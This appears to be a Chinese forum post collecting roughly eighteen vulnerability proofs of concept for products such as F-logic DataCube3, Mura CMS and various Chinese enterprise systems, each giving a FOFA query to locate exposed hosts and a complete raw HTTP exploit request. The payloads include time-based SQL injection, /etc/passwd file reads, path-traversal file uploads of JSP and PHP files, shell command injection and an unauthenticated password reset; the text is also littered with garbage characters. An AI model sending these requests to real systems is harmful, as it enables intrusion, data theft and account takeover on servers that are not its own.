' j$ x1 q; ~( GHost: host
% A6 O7 F# u4 h
, }- o$ ^% X$ M2 }7 _4 y. Q& E0 D# L3 `) a; W* a; \, @' J
186. F-logic DataCube3 SQL注入8 A0 ^2 Z# W7 T3 X& i
CVE-2024-31750* g5 y- a3 h |8 u$ K" }% ~
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
- Z$ [ ]( h2 d mFOFA:title=="DataCube3"
5 U9 [8 g) r0 W$ g% L1 xPOST /admin/pr_monitor/getting_index_data.php HTTP/1.12 I! w$ m+ ^9 C
Host: your-ip/ x& p( j& Y4 y8 x9 K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0& v/ R- U$ n2 N( k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
/ `- M4 X b2 V; CAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ e' |3 D' o6 p9 ~) s Y
Accept-Encoding: gzip, deflate
9 y6 Q+ o+ R; L3 m" R! TConnection: close
V( {* K( ~/ ?. SContent-Type: application/x-www-form-urlencoded
+ g3 Z, `; r& ]/ C8 X/ x+ c( U( y: C* |
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450' T+ @* n! F) C4 o) D/ f3 {! y n
H3 e4 [5 Q+ R+ X. j5 S; E% f5 r/ ~4 J2 C# u4 B
187. Mura CMS processAsyncObject SQL注入
; F9 e. e. ]. F- I5 e0 X/ dCVE-2024-32640. G. q# Q- b+ {' l
FOFA:"Mura CMS"
/ O/ x" C3 ~; }! K& l5 Q4 fPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
( [, C- o+ t. o- aHost: your-ip
5 H6 k7 b' ` I/ |: u7 v3 a0 qContent-Type: application/x-www-form-urlencoded
5 I, d* k% Z1 o# }+ f
; K% W1 \1 G6 i1 \2 r% P/ x/ Z
% | h" @ I" w9 n5 u2 J& Z" nobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1, S s6 Y% _) j# z1 q
8 g- g' b( b- l9 n' G8 H6 N$ ^
2 V" k$ `+ I" N* a
188. 叁体-佳会视频会议 attachment 任意文件读取
w: Q- L6 r& r; C uversion <= 3.9.7
' b4 V; `& a) ~+ l4 }# q1 }FOFA:body="/system/get_rtc_user_defined_info?site_id"
M' B& P, s, Q$ p* d9 WGET /attachment?file=/etc/passwd HTTP/1.1
1 Y5 j; n. C0 h3 `0 x ?$ `Host: your-ip
& R: u; ^# g7 F' I E. K9 e8 LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
) Y' Y8 [$ X! h# J& YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: u& [/ G; R9 \ _- C1 J' V8 dAccept-Encoding: gzip, deflate
9 g9 U& |9 I* k% U8 k- t# kAccept-Language: zh-CN,zh;q=0.9,en;q=0.80 K6 z9 Q+ Q+ p8 @+ R9 h6 B; k
Connection: close/ U: H" O2 x d$ `; P, h8 m0 H
. l' a$ d4 s5 A) z
+ b' g' V' B& ` s% ^3 L) I1 {% _189. 蓝网科技临床浏览系统 deleteStudy SQL注入; J, k, Y# q7 `, |# ^$ H, K7 ?+ i
FOFA:app="LANWON-临床浏览系统"5 _$ t! x' O1 s$ D8 L
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
7 A& v# K" \: ~( zHost: your-ip0 e9 g$ l+ H' \# ]' x/ j
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.361 _4 q7 s) I$ \7 @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 k5 H- o' R V$ m$ W- M2 h3 yAccept-Encoding: gzip, deflate% A8 T5 p# n+ f
Accept-Language: zh-CN,zh;q=0.92 g8 v- k- a2 Y4 y! c' [
Connection: close
* v* C5 G- a( m2 c h/ S+ W7 H1 c' m6 S
% d5 V2 N4 X w190. 短视频矩阵营销系统 poihuoqu 任意文件读取4 Z/ r' Z, I# l8 Y8 }% x+ m
FOFA:title=="短视频矩阵营销系统"% i9 o1 h+ O! w0 F
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
- z( T' [, ?- \1 x- d. rHost: your-ip
9 Q7 `. x5 Y+ [% K6 |. L/ B$ BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36# L3 ?; w! q9 X! z& g( U. t
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
5 x9 `7 b( y) U4 @$ _8 K2 AContent-Type: application/x-www-form-urlencoded6 ?; H( ^( V$ ?
Accept-Encoding: gzip, deflate& Z5 T' D- u' W9 H" K
Accept-Language: zh-CN,zh;q=0.9
. I% D- k, \5 |/ b& G
+ K0 D+ Y: k0 d& t: x6 Z' L$ {4 ypoi=file:///etc/passwd% ~5 ?0 J( Z5 F9 ^7 Z/ D" B4 `8 _& H
' ]& B9 R9 R Y# w- D# k3 l$ S$ E) b- n( R
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入& g, i& M' P2 o5 ~7 a2 D( a0 {
FOFA:body="/CDGServer3/index.jsp"
; g1 A7 O) C; |7 U7 ?5 fPOST /CDGServer3/js/../NavigationAjax HTTP/1.11 m0 q F* U# _; ?- u( z" Q
Host: your-ip
! ^, q# B8 R3 i/ v4 UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
; J. d5 q5 o3 k) z8 \ Y( u* vContent-Type: application/x-www-form-urlencoded
) x7 @; M# H. S) w2 g3 s# d) I! r2 U: y$ {; K2 X
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=% {% i* F1 v: S6 D1 f4 c
( {/ F! \$ n. {& c" q/ e- \
$ \$ Q y* U4 A2 R4 o
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
. b8 u0 X. ]% o* }2 d5 M) T8 lFOFA:title="用户登录_富通天下外贸ERP"; k* n+ C& M6 @ }9 c
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
6 ?0 Z3 D6 s6 F4 Z8 ?: b/ u8 aHost: your-ip) F) Z9 F- Q3 W$ G% H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.367 U* k) z) W' u
Content-Type: application/x-www-form-urlencoded
1 n: v5 B# Q" m# i9 H3 l
9 f" O8 w9 P: L8 q$ }- a% j) A; Q: q# T6 z3 {/ B( ]2 [
<% @ webhandler language="C#" class="AverageHandler" %>" U/ T7 Q5 t6 ^+ d* p9 ?
using System;5 N+ Z7 H8 Y* Q
using System.Web;2 C8 \$ p9 J/ z( q7 h( b% p
public class AverageHandler : IHttpHandler
( S, u% l+ u) q{
) y7 i, l, b$ v Z# a) _5 Upublic bool IsReusable3 s* | \( e: o& A; Q. r5 N
{ get { return true; } }
h2 w$ J U2 i3 X8 ppublic void ProcessRequest(HttpContext ctx)
% b% o, w$ N: m# b. t7 u" G7 J{7 S( A, D* g9 P7 S
ctx.Response.Write("test");
6 \" q% G- _0 q, ^7 U}
$ \) }2 H4 A+ F. A8 l}
5 W) f0 H6 S& B A4 ~. {" ^- M* w0 O4 ^
?) p, @/ F) ?+ v& F193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行# b1 e2 |% d8 P$ ]
FOFA:body="山石云鉴主机安全管理系统"
1 u* k) n" [9 B& A7 W9 GGET /master/ajaxActions/getTokenAction.php HTTP/1.1
/ c4 y! ~* X4 Z4 [2 U& wHost:. ]3 y; b& B3 R ]
Cookie: PHPSESSID=2333333333333;* a* g# ~: u6 o& @. N5 B) u
Content-Type: application/x-www-form-urlencoded
5 e& r Q( c$ _User-Agent: Mozilla/5.0
: j- ^7 p3 C! F9 F
" N3 N/ B, c0 j7 |# N, V4 t: z7 U3 G+ M0 y& c' S4 J- @
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
% ^. B( g) d' @1 R" D- CHost:
7 I4 x. n$ P* b7 {; G# L8 A8 e) a. M5 LUser-Agent: Mozilla/5.0! v2 x' W& i1 W6 D1 F: p
Accept-Encoding: gzip, deflate7 i' s# ]" w) Z6 j7 I
Accept: */*' \8 }) M! Y& A5 |. }1 b
Connection: close
( T/ V0 @' n# q+ JCookie: PHPSESSID=2333333333333;
1 S0 Y1 X0 b2 ?5 d0 nContent-Type: application/x-www-form-urlencoded' x1 R, J% r1 O4 N
Content-Length: 84: U; V/ z9 ~/ F
7 B7 x& k" {# y
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')9 @6 L1 E5 v) z$ l7 [' Q- F3 h. k
) ~8 B8 h. t+ ~5 y( c7 U; U
% T/ E( H1 ^" g6 zGET /master/img/config HTTP/1.1
/ z7 f6 y: b/ r! ]* yHost:
; R) _1 k$ u8 {& ?, B2 Y4 L! p3 DUser-Agent: Mozilla/5.0
! l+ h% a6 n- s5 [
3 f& `- m9 @! R4 y1 I ?( t' T& ~ G" u% `' T+ n' r7 J: O; b% s" M2 Q; Y
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
, U* Z% u, f0 i4 Y6 O6 z) qFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在 a$ c W$ v7 A# H# P- @
6 E7 U4 o" E5 w& `# n) u! J: F% {POST /servlet/uploadAttachmentServlet HTTP/1.1
# {, Q( ^! ?5 c$ d# }Host: host
7 `, d1 l8 w: A! M, `5 [7 w) CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.362 N2 r9 Q- `3 _4 t/ d: ^
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8- _8 V# q( F4 j/ Y w8 S; s
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, L6 g. m) E& ^+ [+ p; ^Accept-Encoding: gzip, deflate& Y7 a) G3 ]1 b
Connection: close" t5 J0 C" M9 a+ C
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk8 ]0 B- @6 |" w* ]" o7 e
------WebKitFormBoundaryKNt0t4vBe8cX9rZk$ A, e u$ j9 V: A9 m: a
5 J3 Z2 E% |3 I" i
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
: F( ]5 k2 s7 U. t+ hContent-Type: text/plain2 `4 M2 D8 Z0 _ e
<% out.println("hello");%>
6 U7 b$ t2 M6 r. {& H4 l------WebKitFormBoundaryKNt0t4vBe8cX9rZk. v, b, y* A& j; c$ E7 x8 S
Content-Disposition: form-data; name="json"
3 t, X/ E0 }% p {"iq":{"query":{"UpdateType":"mail"}}}
- d: ^5 T' I5 O5 g$ R------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
% Q' y7 h* E$ i F0 Y& L9 P u m* V: C7 H" r3 C- ]! x* Y
4 i6 D4 n8 L, b: m4 h( x) K2 f195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
' C0 M4 S Z# M: R+ CFOFA:title=="飞鱼星企业级智能上网行为管理系统
( G- h% Q$ E5 {, d2 APOST /send_order.cgi?parameter=operation HTTP/1.1
! G I( Z7 j. X9 yHost: 127.0.0.1
) C0 z! R/ S) d+ d1 MPragma: no-cache
' I4 s: H9 ~9 }+ l2 w0 WCache-Control: no-cache/ i. X3 \8 f+ f6 m G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" r6 d, z ?7 I- C! ^4 C" K
Accept: */*
8 }8 \) ?4 T+ P+ D4 _Accept-Encoding: gzip, deflate' v* X2 s3 h3 Q2 F) A- v6 a- c
Accept-Language: zh-CN,zh;q=0.9# R- X6 ]. | K6 ]0 b7 y% k
Connection: close
" p5 z, E# ~7 L a5 KContent-Type: application/x-www-form-urlencoded+ K% _3 v$ J& h4 \) w
Content-Length: 68! f/ {1 m, g$ O; v' K9 u! I1 ]
' F- \2 x8 D% K$ |/ D* w# A
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}8 @$ v9 w/ g' \" u, _
$ F7 e5 o3 k; R/ R0 U4 ~
" @8 ^3 Q4 }! C6 B4 q: `196. 河南省风速科技统一认证平台密码重置$ `# a- h3 a1 _
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
+ c7 L' u! b& Q( |; j9 hPOST /cas/userCtl/resetPasswordBySuper HTTP/1.1
! J( o5 ^+ O. iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.369 U) }+ o' ^! Z! a) z' R
Content-Type: application/json;charset=UTF-8' b' M- A) ?; c5 s8 [) @9 M1 B5 Z! D
X-Requested-With: XMLHttpRequest; o# g9 u* [8 B' g
Host:
1 U3 `1 n% f+ F3 Q# w% ^/ qAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
3 M2 r; h! h3 q zContent-Length: 45& N( f2 X+ s: {' m
Connection: close
2 E+ O6 m, ]+ ~* k& I/ i# D) r# h: M, @% I
{"xgh":"test","newPass":"test666","email":""}
0 u% v5 @: S( R- G k9 d- k" ]& G( Q* H* v% `9 d+ w7 T
/ ]( t. l- x. ?, P! p+ ^
7 s1 f6 w: J2 D3 s" Z; f197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
9 {( ]& u6 R& U3 \FOFA:app="浙大恩特客户资源管理系统"/ W' Y0 X! ~# w
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.10 Y) M: y M/ Y) l( `
Host:
; ^( r" ^+ _( p; GUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
7 j" X" z4 a4 r5 BAccept-Encoding: gzip, deflate
" c/ H6 _* _& ^5 ^4 YConnection: close: [* l6 h+ `2 m( Q
6 o: T" g( Y3 Z, X' F( F9 T; v D1 n# \
4 C" l+ K. W6 ^" p- z
198. 阿里云盘 WebDAV 命令注入
# v" f, z1 p$ h/ i: y& X2 rCVE-2024-296400 n" Q; t, p- }, _7 T5 b5 Z( i9 E
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.11 T' H9 p6 q* x0 G/ d
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
; g( S4 {# B. w% P" IAccept: */*: X$ z+ t) K9 I7 |
Accept-Encoding: gzip, deflate' i9 K2 G. [$ h2 X
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.63 V/ g% O& h2 f- I6 ]
Connection: close; n' m; F! I3 i: R9 m2 ]
; E( C U% t3 z
- e3 S" \. d- x6 c* J& h2 L199. cockpit系统assetsmanager_upload接口 文件上传/ z4 T/ F: c7 ^2 B
: H% ], G+ _6 U% G9 f
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:- L4 x$ [/ g* L6 p2 q: X( {5 s$ E, t
GET /auth/login?to=/ HTTP/1.1, H/ @2 x9 M+ V) ]( U' _2 i- z% |
3 J' r# {2 v9 B; i D. m& G2 O响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
$ |4 C( P q* q/ ~/ D; b! ^1 j. @* W1 c# E
2.使用刚才上一步获取到的jwt获取cookie:
+ Z3 H9 z- w2 A% l* E z; l, `( i3 K
POST /auth/check HTTP/1.1
# \+ ^9 |( w6 K% [Content-Type: application/json
9 a' O, B! K% e* i' | a$ k7 O8 P9 `* F" ^. Y+ [: W' K
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
: y: Y! y4 E9 s6 R! @% ~! m1 B$ D8 c* T
响应:200,返回值:
- h4 V8 d- T8 B+ ZSet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
0 r' l x: c# S& P" zFofa:title="Authenticate Please!"
~ A `6 L& lPOST /assetsmanager/upload HTTP/1.1' `0 `4 j+ j0 ^% b8 S2 i
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
9 b, `- o6 t+ V* `5 H! kCookie: mysession=95524f01e238bf51bb60d77ede3bea92
]# o3 G8 `4 B5 ~
( ]$ h3 r) [( f-----------------------------36D28FBc36bd6feE7Fb30 e, p( t. \8 @( y& d7 j
Content-Disposition: form-data; name="files[]"; filename="tttt.php"1 l, n! {) n, g; B6 M1 B; W
Content-Type: text/php# ]9 ?3 y3 x8 k7 n- k8 |
+ G( f! g2 U/ D5 G6 P7 P, S6 `<?php echo "tttt";unlink(__FILE__);?>& T! i# z8 L' [" T4 y
-----------------------------36D28FBc36bd6feE7Fb3( d3 P' l% Z" G: ~8 B. d8 x
Content-Disposition: form-data; name="folder"
, R3 i2 O8 S0 E) D
" @( `8 [# f. L. w- ?-----------------------------36D28FBc36bd6feE7Fb3--' ^$ t' ?( S# z% N
: u' o# Y! q# ?' ~0 d: @1 _9 ?% d5 B% C" m+ }
/storage/uploads/tttt.php
3 }# t0 @: M( w- h+ p# u9 A& F& m n" j4 Y
200. SeaCMS海洋影视管理系统dmku SQL注入
, g8 K/ U4 x! w0 \# X3 qFOFA:app="海洋CMS" Q8 J6 u" o# ~- p& V0 w6 u
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
6 W" S! S+ a7 O8 Y9 Q6 ACookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
' a3 i) ]- g2 g X3 T3 I! L6 A- pUpgrade-Insecure-Requests: 1
4 J9 R" f/ ~8 {- y4 s5 E% \3 c4 t2 f4 wCache-Control: max-age=0
- X; _* ^& G4 [. c( \# r8 X1 Q* }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
. l- W/ f- d% u/ Y4 M0 ZAccept-Encoding: gzip, deflate/ v5 z) R9 Z! w
Accept-Language: zh-CN,zh;q=0.9
8 }+ v5 j9 U- `; J; _5 H) t* L6 O/ W9 N
" ?4 t, n/ `4 p* Z201. 方正全媒体新闻采编系统 binary SQL注入
% \. b/ T, x; x0 y: XFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"2 a: i o! p+ y: |: y( u. U0 b
POST /newsedit/newsplan/task/binary.do HTTP/1.1% u1 ?( e& }" h/ e
Content-Type: application/x-www-form-urlencoded* N& C4 b9 s# u1 \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* V& z1 u& d& {* q. R B
Accept-Encoding: gzip, deflate
# x. [, k `+ H. }7 c: jAccept-Language: zh-CN,zh;q=0.9
$ K& r6 y( u& [ d0 s9 l, ^2 RConnection: close3 b9 { Q' ~. `
8 a5 i2 o' R8 b
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1) M5 M7 V8 }) D" R
5 c% h8 Z% W) } S1 J1 W6 U' i
! R( U2 S7 W2 `" ~202. 微擎系统 AccountEdit任意文件上传
9 s5 s a, R, ^& [3 g3 bFOFA:body="/Widgets/WidgetCollection/"
: o# D, b2 M, d. ?, @# J获取__VIEWSTATE和__EVENTVALIDATION值
9 K: W6 J2 @. c7 \ Z M$ u6 {* }/ ^GET /User/AccountEdit.aspx HTTP/1.1
# X6 r- [' S. u! KHost: 滑板人之家( j0 o3 B5 s: G% {" T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.316 T& j' K* p" ~% {/ I) J
Content-Length: 05 }* j/ k2 l; Q2 r
* u. T0 M" ~* x& ^' Y \0 J
1 T& }& p; p* v3 o替换__VIEWSTATE和__EVENTVALIDATION值
$ Q. |5 X3 s( D APOST /User/AccountEdit.aspx HTTP/1.1; v ?% }7 Q% Z6 L9 B
Accept-Encoding: gzip, deflate, br
5 w* ?! R7 A9 I5 c& V8 G$ `Content-Type: multipart/form-data;boundary=---------------------------786435874t385875938657365873465673587356873 S3 u3 M! E. k E5 X
G" o4 m* H6 E+ Q% G+ _& \: E
-----------------------------786435874t38587593865736587346567358735687) T9 {$ A4 u- F d! w, C' @
Content-Disposition: form-data; name="__VIEWSTATE"
6 i6 [3 D# } D9 U7 E+ g
& g& j' C3 T9 v6 U__VIEWSTATE0 n6 e/ ?0 D& z2 _- u8 I% e4 t
-----------------------------786435874t38587593865736587346567358735687
! Z6 T! U- k& \! D: S1 |1 l2 {2 u1 `Content-Disposition: form-data; name="__EVENTVALIDATION"
! ?# q) @( F6 M5 h1 w# l p; F& @4 x/ c" r# E9 M/ n
__EVENTVALIDATION4 V6 S# S2 x! @+ D" @9 R
-----------------------------786435874t38587593865736587346567358735687
: b! V; L- _3 C6 m0 C1 wContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"+ J: ?( I' h$ F8 |6 h8 f( ]8 z2 m
Content-Type: text/plain
6 w0 x5 p2 j4 _/ V K5 u, R+ ^3 {, v# i1 W# j0 G. E0 S. m5 ~& o
Hello World!
p. C+ y/ V8 O1 U4 j-----------------------------786435874t38587593865736587346567358735687- f4 L' i* t# z
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
, r0 I, n# e$ b- X$ {8 ~$ T3 A; y2 }3 c4 t) E5 v
上传图片
! M8 F r( }1 @) n1 u& i+ e$ d-----------------------------786435874t38587593865736587346567358735687
: ^1 V% ~- {6 b- Q' BContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"* V+ Y$ U* P3 d* P& e
; W! a' \6 L( t+ F6 Y; G ?* B) u P$ {6 M) d$ m- D4 y( p8 ~6 _+ d
-----------------------------786435874t38587593865736587346567358735687
7 U9 \+ j( C5 k, o7 m* ~Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
* s$ P, H Z3 C3 E a' i' q2 w( c9 m9 N J5 e+ H0 S, {
8 f- z9 s& }% a% X3 J-----------------------------786435874t38587593865736587346567358735687--
u) x' C1 Z: q. ~0 }% b
3 Q2 ?* ?* p6 q% X# k9 O( ]( p% l, f( p
/_data/Uploads/1123.txt
7 b$ L# ?( y: Y, y2 k: B) k
7 r; |; w) ]% ^* [203. 红海云EHR PtFjk 文件上传! L v5 h' h Y* g
FOFA:body="RedseaPlatform"9 c7 A) g* j, ~1 N E% `+ ~4 U0 E: e
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
# l; v& Y L. a8 k3 z/ q- C* dHost: x.x.x.x
: x4 Q |' i9 FAccept-Encoding: gzip
$ s1 f. K4 |* hUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.152 o$ a, e& Q- z5 ~7 ?( Z/ {
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4' \2 q8 o$ d* R; Q7 m+ c
Content-Length: 210
2 Q, U# {- C4 s. n
, o7 O5 s+ S" F# s9 T& X------WebKitFormBoundaryt7WbDl1tXogoZys4! Z( c6 H; Q$ t+ Q) f3 M
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
; b }. Q3 v @) j# bContent-Type:image/jpeg; n) v0 w& b" b
' b8 U& H& y+ s h! ~7 o4 {( V<% out.print("hello,eHR");%>
9 y& \7 f3 W3 Q' G8 O* R6 D------WebKitFormBoundaryt7WbDl1tXogoZys4--! @: m0 q- U! C; @
4 G8 r, E, L' c9 z
& V6 ~3 \+ ^$ B- Z$ m- D8 k- f# J g0 O4 L
# }, o! W( D6 k2 [6 }) l% A5 ]$ i2 {% c% l* ^! x }9 R
+ t8 X6 E/ ]5 @/ T7 w |
发表于 2024-6-5 14:31:29
收藏
支持
反对